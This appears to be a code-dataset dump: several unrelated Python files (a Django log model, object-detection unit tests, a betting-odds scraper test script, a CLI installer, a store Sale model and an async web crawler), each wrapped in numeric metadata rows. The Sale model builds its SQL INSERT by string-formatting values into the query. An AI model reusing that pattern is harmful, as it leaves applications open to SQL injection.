| 0
| 0.132847
| 0
| 0.033333
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9555f153510ab57941a2d63dc997b5c2a9d5575
| 8,325
|
py
|
Python
|
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
cykel/models/cykel_log_entry.py
|
mohnbroetchen2/cykel_jenarad
|
6ed9fa45d8b98e1021bc41a57e1250ac6f0cfcc4
|
[
"MIT"
] | null | null | null |
from django.contrib.admin.options import get_content_type_for_model
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.urls import reverse
from django.utils.html import format_html
from django.utils.translation import gettext_lazy as _
# log texts that only contain {object}
LOG_TEXTS_BASIC = {
"cykel.bike.rent.unlock": _("{object} has been unlocked"),
"cykel.bike.rent.longterm": _("{object} has been running for a long time"),
"cykel.bike.forsaken": _("{object} had no rent in some time"),
"cykel.bike.missing_reporting": _("{object} (missing) reported its status again!"),
"cykel.tracker.missing_reporting": _(
"{object} (missing) reported its status again!"
),
"cykel.tracker.missed_checkin": _("{object} missed its periodic checkin"),
}
LOG_TEXTS = {
"cykel.bike.rent.finished.station": _(
"{object} finished rent at Station {station} with rent {rent}"
),
"cykel.bike.rent.finished.freefloat": _(
"{object} finished rent freefloating at {location} with rent {rent}"
),
"cykel.bike.rent.started.station": _(
"{object} began rent at Station {station} with rent {rent}"
),
"cykel.bike.rent.started.freefloat": _(
"{object} began rent freefloating at {location} with rent {rent}"
),
"cykel.bike.tracker.battery.critical": _(
"{object} (on Bike {bike}) had critical battery voltage {voltage} V"
),
"cykel.bike.tracker.battery.warning": _(
"{object} (on Bike {bike}) had low battery voltage {voltage} V"
),
"cykel.tracker.battery.critical": _(
"{object} had critical battery voltage {voltage} V"
),
"cykel.tracker.battery.warning": _("{object} had low battery voltage {voltage} V"),
"cykel.bike.tracker.missed_checkin": _(
"{object} (on Bike {bike}) missed its periodic checkin"
),
}
class CykelLogEntry(models.Model):
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField(db_index=True)
content_object = GenericForeignKey("content_type", "object_id")
timestamp = models.DateTimeField(auto_now_add=True, db_index=True)
action_type = models.CharField(max_length=200)
data = models.JSONField(default=dict)
class Meta:
ordering = ("-timestamp",)
verbose_name = "Log Entry"
verbose_name_plural = "Log Entries"
def delete(self, using=None, keep_parents=False):
raise TypeError("Logs cannot be deleted.")
def __str__(self):
return (
f"CykelLogEntry(content_object={self.content_object}, "
+ f"action_type={self.action_type}, timestamp={self.timestamp})"
)
@staticmethod
def create_unless_time(timefilter, **kwargs):
obj = kwargs["content_object"]
action_type = kwargs["action_type"]
if not CykelLogEntry.objects.filter(
content_type=get_content_type_for_model(obj),
object_id=obj.pk,
action_type=action_type,
timestamp__gte=timefilter,
).exists():
CykelLogEntry.objects.create(**kwargs)
def display_object(self):
from bikesharing.models import Bike, LocationTracker, Rent
try:
co = self.content_object
except ObjectDoesNotExist:
return ""
text = None
data = None
if isinstance(co, Bike):
text = _("Bike {ref}")
data = {
"url": reverse(
"admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
args=[co.id],
),
"ref": co.bike_number,
}
if isinstance(co, LocationTracker):
text = _("Tracker {ref}")
data = {
"url": reverse(
"admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
args=[co.id],
),
"ref": co.device_id,
}
if isinstance(co, Rent):
text = _("Rent {ref}")
data = {
"url": reverse(
"admin:%s_%s_change" % (co._meta.app_label, co._meta.model_name),
args=[co.id],
),
"ref": co.id,
}
if text and data:
data["ref"] = format_html('<a href="{url}">{ref}</a>', **data)
return format_html(text, **data)
elif text:
return text
return ""
def display(self):
from bikesharing.models import Bike, Location, Station
if self.action_type in LOG_TEXTS_BASIC:
return format_html(
LOG_TEXTS_BASIC[self.action_type], object=self.display_object()
)
if self.action_type in LOG_TEXTS:
fmt = LOG_TEXTS[self.action_type]
data = {"object": self.display_object()}
if self.action_type.startswith(
"cykel.bike.tracker.battery."
) or self.action_type.startswith("cykel.tracker.battery."):
voltage = self.data.get("voltage")
if voltage:
data["voltage"] = voltage
else:
data["voltage"] = "[unknown]"
if self.action_type.startswith("cykel.bike.tracker."):
bike_id = self.data.get("bike_id")
if bike_id:
try:
bike = Bike.objects.get(pk=bike_id)
ref = bike.bike_number
except ObjectDoesNotExist:
ref = bike_id
bike_url = reverse("admin:bikesharing_bike_change", args=[bike_id])
data["bike"] = format_html(
'<a href="{url}">{ref}</a>', url=bike_url, ref=ref
)
else:
data["bike"] = "[unknown]"
if self.action_type.startswith("cykel.bike.rent."):
rent_id = self.data.get("rent_id")
if rent_id:
rent_url = reverse("admin:bikesharing_rent_change", args=[rent_id])
data["rent"] = format_html(
'<a href="{url}">{ref}</a>', url=rent_url, ref=rent_id
)
else:
data["rent"] = "[unknown]"
if self.action_type.startswith(
"cykel.bike.rent."
) and self.action_type.endswith(".station"):
station_id = self.data.get("station_id")
if station_id:
try:
station = Station.objects.get(pk=station_id)
ref = station.station_name
except ObjectDoesNotExist:
ref = station_id
station_url = reverse(
"admin:bikesharing_station_change", args=[station_id]
)
data["station"] = format_html(
'<a href="{url}">{ref}</a>', url=station_url, ref=ref
)
else:
data["station"] = "[unknown]"
if self.action_type.startswith(
"cykel.bike.rent."
) and self.action_type.endswith(".freefloat"):
location_id = self.data.get("location_id")
if location_id:
try:
loc = Location.objects.get(pk=location_id)
ref = "{}, {}".format(loc.geo.y, loc.geo.x)
except ObjectDoesNotExist:
ref = location_id
location_url = reverse(
"admin:bikesharing_location_change", args=[location_id]
)
data["location"] = format_html(
'<a href="{url}">{ref}</a>', url=location_url, ref=ref
)
else:
data["location"] = "[unknown]"
return format_html(fmt, **data)
return self.action_type
| 37.669683
| 87
| 0.538498
| 862
| 8,325
| 5.011601
| 0.194896
| 0.046296
| 0.04537
| 0.025926
| 0.338194
| 0.302083
| 0.28588
| 0.223843
| 0.165278
| 0.13287
| 0
| 0.00055
| 0.344505
| 8,325
| 220
| 88
| 37.840909
| 0.791094
| 0.004324
| 0
| 0.227979
| 0
| 0
| 0.247013
| 0.098347
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025907
| false
| 0
| 0.051813
| 0.005181
| 0.160622
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9565831d1ae75fe2b15d03a39a78761d5e269d5
| 7,991
|
py
|
Python
|
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
mlx/od/archive/ssd/test_utils.py
|
lewfish/mlx
|
027decf72bf9d96de3b4de13dcac7b352b07fd63
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import torch
from torch.nn.functional import binary_cross_entropy as bce, l1_loss
from mlx.od.ssd.utils import (
ObjectDetectionGrid, BoxList, compute_intersection, compute_iou, F1)
class TestIOU(unittest.TestCase):
def test_compute_intersection(self):
a = torch.tensor([[0, 0, 2, 2],
[1, 1, 3, 3],
[2, 2, 4, 4]], dtype=torch.float)
b = torch.tensor([[0, 0, 2, 2],
[1, 1, 3, 3]], dtype=torch.float)
inter = compute_intersection(a, b)
exp_inter = torch.tensor(
[[4, 1],
[1, 4],
[0, 1]], dtype=torch.float)
self.assertTrue(inter.equal(exp_inter))
def test_compute_iou(self):
a = torch.tensor([[0, 0, 2, 2],
[1, 1, 3, 3],
[2, 2, 4, 4]], dtype=torch.float)
b = torch.tensor([[0, 0, 2, 2],
[1, 1, 3, 3]], dtype=torch.float)
inter = compute_iou(a, b)
exp_inter = torch.tensor(
[[1, 1./7],
[1./7, 1],
[0, 1./7]], dtype=torch.float)
self.assertTrue(inter.equal(exp_inter))
class TestBoxList(unittest.TestCase):
def test_score_filter(self):
boxes = torch.tensor([[0, 0, 2, 2],
[1, 1, 3, 3]], dtype=torch.float)
labels = torch.tensor([0, 1])
scores = torch.tensor([0.3, 0.7])
bl = BoxList(boxes, labels, scores)
filt_bl = bl.score_filter(0.5)
exp_bl = BoxList(torch.tensor([[1, 1, 3, 3]], dtype=torch.float),
torch.tensor([1]),
torch.tensor([0.7]))
self.assertTrue(filt_bl.equal(exp_bl))
def test_nms(self):
boxes = torch.tensor([[0, 0, 10, 10],
[1, 1, 11, 11],
[9, 9, 19, 19],
[0, 0, 10, 10],
[20, 20, 21, 21]], dtype=torch.float)
labels = torch.tensor([0, 0, 0, 1, 1])
scores = torch.tensor([0.5, 0.7, 0.5, 0.5, 0.5])
bl = BoxList(boxes, labels, scores)
bl = bl.nms(0.5)
exp_boxes = torch.tensor([[1, 1, 11, 11],
[9, 9, 19, 19],
[0, 0, 10, 10],
[20, 20, 21, 21]], dtype=torch.float)
exp_labels = torch.tensor([0, 0, 1, 1])
exp_scores = torch.tensor([0.7, 0.5, 0.5, 0.5])
exp_bl = BoxList(exp_boxes, exp_labels, exp_scores)
self.assertTrue(bl.equal(exp_bl))
class TestDetectorGrid(unittest.TestCase):
def setUp(self):
grid_sz = 2
anc_sizes = torch.tensor([
[2, 0.5],
[0.5, 2]])
num_classes = 2
self.grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)
def test_decode(self):
batch_sz = 1
out = torch.zeros(self.grid.get_out_shape(batch_sz), dtype=torch.float)
# y_offset, x_offset, y_scale, x_scale, c0, c1
out[0, 1, :, 0, 0] = torch.tensor([0.5, 0, 1, 1, 0.1, 0.7])
exp_boxes = torch.tensor([-0.25, -1.5, 0.25, 0.5])
exp_labels = torch.ones((1, 8), dtype=torch.long)
exp_labels[0, 1] = torch.tensor(1)
exp_scores = torch.zeros((1, 8))
exp_scores[0, 1] = torch.tensor(0.7)
boxes, labels, scores = self.grid.decode(out)
self.assertTrue(boxes[0, 1, :].equal(exp_boxes))
self.assertTrue(labels.equal(exp_labels))
self.assertTrue(scores.equal(exp_scores))
def test_encode(self):
exp_out = torch.zeros(self.grid.get_out_shape(1), dtype=torch.float)
# y_offset, x_offset, y_scale, x_scale, c0, c1
exp_out[0, 1, :, 0, 1] = torch.tensor([0, 0, 1, 0.5, 0, 1])
boxes = torch.tensor([[[-0.75, 0, -0.25, 1]]])
labels = torch.tensor([[1]])
out = self.grid.encode(boxes, labels)
self.assertTrue(out.equal(exp_out))
def test_get_preds(self):
grid_sz = 2
anc_sizes = torch.tensor([
[1., 1],
[2, 2]])
num_classes = 2
grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)
boxes = torch.tensor([[[0, 0, 0.5, 0.5]]])
labels = torch.tensor([[1]])
output = grid.encode(boxes, labels)
b, l, s = grid.get_preds(output)
self.assertTrue(b.equal(boxes))
self.assertTrue(l.equal(labels))
def test_compute_losses(self):
boxes = torch.tensor([[[-0.75, 0, -0.25, 1]]])
labels = torch.tensor([[1]])
gt = self.grid.encode(boxes, labels)
boxes = torch.tensor([[[-1., 0, 0, 1]]])
labels = torch.tensor([[0]])
out = self.grid.encode(boxes, labels)
bl, cl = self.grid.compute_losses(out, gt)
bl, cl = bl.item(), cl.item()
exp_bl = l1_loss(torch.tensor([0, 0, 1, 0.5]),
torch.tensor([0, 0, 2, 0.5])).item()
self.assertEqual(bl, exp_bl)
num_class_els = 16
exp_cl = ((2 * bce(torch.tensor(1.), torch.tensor(0.))).item() /
num_class_els)
self.assertEqual(cl, exp_cl)
class TestF1(unittest.TestCase):
def setUp(self):
grid_sz = 2
anc_sizes = torch.tensor([
[1., 1],
[2, 2]])
num_classes = 3
self.grid = ObjectDetectionGrid(grid_sz, anc_sizes, num_classes)
self.f1 = F1(self.grid, score_thresh=0.3, iou_thresh=0.5)
self.f1.on_epoch_begin()
def test1(self):
# Two images in each batch. Each image has:
# Two boxes, both match.
boxes = torch.tensor([
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]],
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
])
labels = torch.tensor([[1, 1], [1, 1]])
output = self.grid.encode(boxes, labels)
target_boxes = torch.tensor([
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]],
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
])
target_labels = torch.tensor([[1, 1], [1, 1]])
target = (target_boxes, target_labels)
# Simulate two batches
self.f1.on_batch_end(output, target)
self.f1.on_batch_end(output, target)
metrics = self.f1.on_epoch_end({})
exp_f1 = self.f1.compute_f1(8, 0, 0)
self.assertEqual(exp_f1, 1.0)
self.assertEqual(exp_f1, metrics['last_metrics'][0])
def test2(self):
# Two boxes, one matches, the other doesn't overlap enough.
boxes = torch.tensor([
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5]]
])
labels = torch.tensor([[1, 1]])
output = self.grid.encode(boxes, labels)
target_boxes = torch.tensor([
[[0, 0, 0.1, 0.1], [-1, -1, -0.5, -0.5]],
])
target_labels = torch.tensor([[1, 1]])
target = (target_boxes, target_labels)
self.f1.on_batch_end(output, target)
metrics = self.f1.on_epoch_end({})
exp_f1 = self.f1.compute_f1(1, 1, 1)
self.assertEqual(exp_f1, 0.5)
self.assertEqual(exp_f1, metrics['last_metrics'][0])
def test3(self):
# Three boxes, one matches, one overlaps but has the wrong label,
# and one doesn't match.
boxes = torch.tensor([
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5], [-0.5, 0, 0, 0.5]]
])
labels = torch.tensor([[1, 2, 1]])
output = self.grid.encode(boxes, labels)
target_boxes = torch.tensor([
[[0, 0, 0.5, 0.5], [-1, -1, -0.5, -0.5], [-0.5, 0, -0.4, 0.1]]
])
target_labels = torch.tensor([[1, 1, 1]])
target = (target_boxes, target_labels)
self.f1.on_batch_end(output, target)
metrics = self.f1.on_epoch_end({})
exp_f1 = self.f1.compute_f1(1, 2, 2)
self.assertEqual(exp_f1, metrics['last_metrics'][0])
if __name__ == '__main__':
unittest.main()
| 36.322727
| 79
| 0.511325
| 1,142
| 7,991
| 3.452715
| 0.119089
| 0.026883
| 0.091301
| 0.023332
| 0.611463
| 0.552118
| 0.501648
| 0.46665
| 0.411362
| 0.33477
| 0
| 0.084946
| 0.320861
| 7,991
| 220
| 80
| 36.322727
| 0.641607
| 0.040045
| 0
| 0.441341
| 0
| 0
| 0.005742
| 0
| 0
| 0
| 0
| 0
| 0.094972
| 1
| 0.072626
| false
| 0
| 0.022346
| 0
| 0.117318
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c956809dc40104300810383514543a84d7e16eb4
| 3,284
|
py
|
Python
|
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | null | null | null |
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | 1
|
2020-10-13T15:44:40.000Z
|
2020-10-13T15:44:40.000Z
|
src/utilsmodule/main.py
|
jke94/WilliamHill-WebScraping
|
d570ff7ba8a5c35d7c852327910d39b715ce5125
|
[
"MIT"
] | null | null | null |
'''
AUTOR: Javier Carracedo
Date: 08/10/2020
Auxiliar class to test methods from WilliamHillURLs.py
'''
import WilliamHillURLs
if __name__ == "__main__":
myVariable = WilliamHillURLs.WilliamHillURLs()
# Print all matches played actually.
for item in myVariable.GetAllMatchsPlayedActually(myVariable.URL_FootballOnDirect):
print(item)
'''
OUTPUT EXAMPLE at 08/10/2020 20:19:29:
Islas Feroe Sub 21 v España Sub 21: 90/1 | 15/2 | 1/40
Dornbirn v St Gallen: 90/1 | 15/2 | 1/40
Corellano v Peña Azagresa: 90/1 | 15/2 | 1/40
Esbjerg v Silkeborg: 90/1 | 15/2 | 1/40
Koge Nord v Ishoj: 90/1 | 15/2 | 1/40
Vasco da Gama Sub 20 v Bangu Sub 20: 90/1 | 15/2 | 1/40
Rangers de Talca v Dep. Valdivia: 90/1 | 15/2 | 1/40
San Marcos v Dep. Santa Cruz: 90/1 | 15/2 | 1/40
Melipilla v Puerto Montt: 90/1 | 15/2 | 1/40
Kray v TuRU Dusseldorf: 90/1 | 15/2 | 1/40
Siegen v Meinerzhagen: 90/1 | 15/2 | 1/40
1. FC M'gladbach v Kleve: 90/1 | 15/2 | 1/40
Waldgirmes v Turkgucu-Friedberg: 90/1 | 15/2 | 1/40
Zamalek v Wadi Degla: 90/1 | 15/2 | 1/40
Elva v Flora B: 90/1 | 15/2 | 1/40
Fujairah FC v Ajman: 90/1 | 15/2 | 1/40
Vanersborg v Ahlafors: 90/1 | 15/2 | 1/40
'''
# Print all URL mathes played actually.
for item in myVariable.GetAllUrlMatches(myVariable.URL_FootballOnDirect):
print(item)
'''OUTPUT EXAMPLE at 08/10/2020 20:19:29:
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701125/islas-feroe-sub-21-â-españa-sub-21
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701988/dornbirn-â-st-gallen
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18702077/corellano-â-peña-azagresa
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694620/esbjerg-â-silkeborg
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18702062/koge-nord-â-ishoj
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701883/vasco-da-gama-sub-20-â-bangu-sub-20
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694610/rangers-de-talca-â-dep-valdivia
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694611/san-marcos-â-dep-santa-cruz
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694612/melipilla-â-puerto-montt
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694624/kray-â-turu-dusseldorf
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694625/siegen-â-meinerzhagen
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694626/1-fc-mgladbach-â-kleve
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694627/waldgirmes-â-turkgucu-friedberg
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18694162/zamalek-â-wadi-degla
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701762/elva-â-flora-b
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701661/fujairah-fc-â-ajman
https://sports.williamhill.es/betting/es-es/fútbol/OB_EV18701852/vanersborg-â-ahlafors
'''
| 49.014925
| 109
| 0.670524
| 511
| 3,284
| 4.264188
| 0.248532
| 0.023405
| 0.039009
| 0.04681
| 0.530978
| 0.505278
| 0.404773
| 0.404773
| 0.404773
| 0.061496
| 0
| 0.130816
| 0.201583
| 3,284
| 66
| 110
| 49.757576
| 0.698703
| 0.052071
| 0
| 0.285714
| 0
| 0
| 0.023669
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9570eba69366671540e993ccc63b21a8b23a785
| 3,185
|
py
|
Python
|
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
mys/cli/subparsers/install.py
|
nsauzede/mys
|
5f5db80b25e44e3ab9c4b97cb9a0fd6fa3fc0267
|
[
"MIT"
] | null | null | null |
import glob
import os
import shutil
import sys
import tarfile
from tempfile import TemporaryDirectory
from ..utils import ERROR
from ..utils import Spinner
from ..utils import add_jobs_argument
from ..utils import add_no_ccache_argument
from ..utils import add_verbose_argument
from ..utils import box_print
from ..utils import build_app
from ..utils import build_prepare
from ..utils import read_package_configuration
from ..utils import run
def install_clean():
if not os.path.exists('package.toml'):
raise Exception('not a package')
with Spinner(text='Cleaning'):
shutil.rmtree('build', ignore_errors=True)
def install_download(args):
command = [
sys.executable, '-m', 'pip', 'download', f'mys-{args.package}'
]
run(command, 'Downloading package', args.verbose)
def install_extract():
archive = glob.glob('mys-*.tar.gz')[0]
with Spinner(text='Extracting package'):
with tarfile.open(archive) as fin:
fin.extractall()
os.remove(archive)
def install_build(args):
config = read_package_configuration()
is_application = build_prepare(args.verbose, 'speed', args.no_ccache, config)
if not is_application:
box_print(['There is no application to build in this package (src/main.mys ',
'missing).'],
ERROR)
raise Exception()
build_app(args.debug, args.verbose, args.jobs, is_application)
return config
def install_install(root, _args, config):
bin_dir = os.path.join(root, 'bin')
bin_name = config['package']['name']
src_file = 'build/app'
dst_file = os.path.join(bin_dir, bin_name)
with Spinner(text=f"Installing {bin_name} in {bin_dir}"):
os.makedirs(bin_dir, exist_ok=True)
shutil.copyfile(src_file, dst_file)
shutil.copymode(src_file, dst_file)
def install_from_current_dirctory(args, root):
install_clean()
config = install_build(args)
install_install(root, args, config)
def install_from_registry(args, root):
with TemporaryDirectory()as tmp_dir:
os.chdir(tmp_dir)
install_download(args)
install_extract()
os.chdir(glob.glob('mys-*')[0])
config = install_build(args)
install_install(root, args, config)
def do_install(_parser, args, _mys_config):
root = os.path.abspath(os.path.expanduser(args.root))
if args.package is None:
install_from_current_dirctory(args, root)
else:
install_from_registry(args, root)
def add_subparser(subparsers):
subparser = subparsers.add_parser(
'install',
description='Install an application from local package or registry.')
add_verbose_argument(subparser)
add_jobs_argument(subparser)
add_no_ccache_argument(subparser)
subparser.add_argument('--root',
default='~/.local',
help='Root folder to install into (default: %(default)s.')
subparser.add_argument(
'package',
nargs='?',
help=('Package to install application from. Installs current package if '
'not given.'))
subparser.set_defaults(func=do_install)
| 28.4375
| 85
| 0.674725
| 405
| 3,185
| 5.11358
| 0.293827
| 0.043457
| 0.072429
| 0.026074
| 0.14872
| 0.084017
| 0.051183
| 0.051183
| 0.051183
| 0.051183
| 0
| 0.000802
| 0.216954
| 3,185
| 111
| 86
| 28.693694
| 0.829591
| 0
| 0
| 0.047059
| 0
| 0
| 0.145997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105882
| false
| 0
| 0.188235
| 0
| 0.305882
| 0.023529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c957b9e1d84b2cf858f2f0ed59b9eda407c2dff9
| 1,011
|
py
|
Python
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | 1
|
2020-02-29T20:14:32.000Z
|
2020-02-29T20:14:32.000Z
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | 5
|
2018-10-24T17:28:48.000Z
|
2019-10-22T11:09:19.000Z
|
app/api/v2/models/sale.py
|
kwanj-k/storemanager-v2
|
89e9573543e32de2e8503dc1440b4ad907bb10b5
|
[
"MIT"
] | null | null | null |
"""
A model class for Sale
"""
# local imports
from app.api.common.utils import dt
from app.api.v2.db_config import conn
from app.api.v2.models.cart import Cart
# cursor to perform database operations
cur = conn.cursor()
class Sale(Cart):
"""
Sale object which inherites some of its attributes from cart
"""
def __init__(self, store_id, seller_id, product, number, amount):
super().__init__(
seller_id=seller_id,
product=product,
number=number,
amount=amount)
self.store_id = store_id
self.created_at = dt
def sell(self):
"""
The sell sql query
"""
sale = """INSERT INTO
sales (store_id,seller_id,product, number,amount,created_at)
VALUES
('%s','%s','%s','%s','%s','%s')""" \
% (self.store_id, self.seller_id, self.product, self.number, self.amount, self.created_at)
cur.execute(sale)
conn.commit()
| 25.275
| 106
| 0.578635
| 129
| 1,011
| 4.364341
| 0.434109
| 0.062167
| 0.021314
| 0.090586
| 0.131439
| 0.120782
| 0.120782
| 0
| 0
| 0
| 0
| 0.002821
| 0.298714
| 1,011
| 39
| 107
| 25.923077
| 0.791255
| 0.153314
| 0
| 0
| 0
| 0
| 0.197775
| 0.103832
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9582e0280978de265a7060549f58e588eceb72b
| 3,306
|
py
|
Python
|
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
src/dembones/collector.py
|
TransactCharlie/dembones
|
b5540a89d4c6d535b589a1a2b06697569879bc05
|
[
"MIT"
] | null | null | null |
import aiohttp
from bs4 import BeautifulSoup
import asyncio
from dembones.webpage import WebPage
import dembones.urltools as ut
import logging
log = logging.getLogger(__name__)
class Collector:
url_hash = {}
def __init__(self, max_concurrent_fetches=3, max_depth=3, fetch_timeout=5,
target_validator=ut.validate_same_domain_up_path):
self.semaphore = asyncio.Semaphore(max_concurrent_fetches)
self.fetch_timeout = fetch_timeout
self.max_depth = max_depth
self.validate_targets = target_validator
async def fetch(self, url, session):
"""Fetch url using session."""
async with session.get(url, timeout=self.fetch_timeout) as r:
r = await r.read()
log.debug(r)
return r
async def recurse_collect(self, url, session, depth):
"""Fetch url and Soup it. Then work out which links we need to recurse."""
# Because we are scheduled at the mercy of the reactor loop. It's possible that
# Some other task is already fetching this page is awaiting the result. Lets check!
if url in self.url_hash:
return
# OK we are the only active task on this reactor. Before we await the page
# let other potential tasks know that we are working on it.
self.url_hash[url] = None
try:
async with self.semaphore:
page = await self.fetch(url, session)
log.info("Collected: Depth {}: Url {}".format(depth, url))
wp = WebPage.from_soup(BeautifulSoup(page, "html.parser"), url)
self.url_hash[url] = wp
# if we haven't hit max_depth yet work out links to recurse over
if depth < self.max_depth:
# Stripped target generator
stripped_targets = (ut.strip_fragment_identifier(t) for t in wp.links)
# Build a set of target urls that obey our restrictions
valid_targets = set([
st for st in stripped_targets
if st not in self.url_hash
and self.validate_targets(url, st)
])
# Generate Async tasks for the next depth level
tasks = [self.recurse_collect(vt, session, depth+1) for vt in valid_targets]
return await asyncio.gather(*tasks)
# There are a myriad of IO based exceptions that can happen - I don't know all of them.
# We want to continue processing other tasks though.
except Exception as e:
log.error(e)
# Upgrade our sentinel entry in the hashmap to at least be the WebPage object
self.url_hash[url] = WebPage()
async def start_recursive_collect(self, url, loop):
"""Start our collection using the event loop (loop)"""
depth = 1
async with aiohttp.ClientSession(loop=loop) as session:
await self.recurse_collect(url, session, depth)
def start_collection(self, url):
loop = asyncio.get_event_loop()
log.debug("Collector Event Loop Start")
loop.run_until_complete(self.start_recursive_collect(url, loop))
log.debug("Collector Event Loop Exit")
return {url: wp.to_dict() for url, wp in self.url_hash.items()}
| 38.894118
| 95
| 0.629462
| 445
| 3,306
| 4.550562
| 0.382022
| 0.034568
| 0.032593
| 0.019259
| 0.02963
| 0.02963
| 0
| 0
| 0
| 0
| 0
| 0.002583
| 0.297338
| 3,306
| 84
| 96
| 39.357143
| 0.869135
| 0.209316
| 0
| 0
| 0
| 0
| 0.036416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.269231
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
